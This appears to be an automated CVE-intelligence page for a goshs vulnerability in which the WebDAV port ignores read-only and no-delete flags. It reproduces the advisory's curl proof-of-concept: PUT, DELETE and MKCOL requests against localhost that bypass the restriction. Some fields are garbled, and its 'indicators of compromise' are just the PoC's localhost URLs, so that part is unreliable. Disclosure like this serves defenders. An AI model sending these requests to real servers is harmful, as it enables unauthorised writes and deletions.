HomeCVE Intelligence › CVE-2026-50138
CVSS 8.1 HIGH Vulnerability

CVE-2026-50138: goshs: WebDAV listener ignores --read-only, --upload-only, and --no-delete mode flags

WebDAV listener ignores --read-only, --upload-only, and --no-delete mode flags Ecosystem: Go Package: goshs.de/goshs/v2 (github.com/patrickhener/goshs) Affected: /tmp/r/x.txt goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b…

8.1CVSS Score
HIGHSeverity
NOCISA KEV
VulnerabilityImpact Type

📋 Vulnerability Details

CVE IDCVE-2026-50138
Vendorgo
Affected Productgoshs.de/goshs/v2
Vulnerability TypeVulnerability
CVSS Score8.1 (HIGH)
Actively Exploited❌ No known exploitation
Patch StatusSee Vendor Advisory →
Reported ByCYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories)

🔬 Technical Analysis

WebDAV listener ignores --read-only, --upload-only, and --no-delete mode flags Ecosystem: Go

Package: goshs.de/goshs/v2 (github.com/patrickhener/goshs) Affected: /tmp/r/x.txt goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b admin:pw & curl -u admin:pw -X PUT http://localhost:18000/y.txt --data x

403 (HTTP enforces -ro)

curl -u admin:pw -X PUT http://localhost:18001/y.txt --data x

201 (WebDAV writes anyway)

curl -u admin:pw -X DELETE http://localhost:18001/x.txt

204 (WebDAV deletes anyway)

curl -u admin:pw -X MKCOL http://localhost:18001/pwned/

201 (WebDAV creates dir)

`

Impact - Integrity--read-only and --no-delete` are silently downgraded to "no protection" on the WebDAV port. Any WebDAV client (curl, cadaver, Windows Explorer, Finder) can over

🎯 Known Indicators of Compromise

{"type":"url","value":"http://localhost:18000/y.txt","confidence_score":0.82,"first_seen":"2026-07-01","source_count":1} {"type":"url","value":"http://localhost:18001/y.txt","confidence_score":0.82,"first_seen":"2026-07-01","source_count":1} {"type":"url","value":"http://localhost:18001/x.txt","confidence_score":0.82,"first_seen":"2026-07-01","source_count":1} {"type":"url","value":"http://localhost:18001/pwned/","confidence_score":0.82,"first_seen":"2026-07-01","source_count":1}

📚 Advisory References

⚡ DETECTION RULES AVAILABLE

Get CVE-2026-50138 Detection Pack

Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.

✓ Sigma Rules ✓ YARA Pack ✓ IOC Table ✓ SIEM Queries
🛡️ Get Detection Pack → 🔌 Access via API →

🔗 Related Intelligence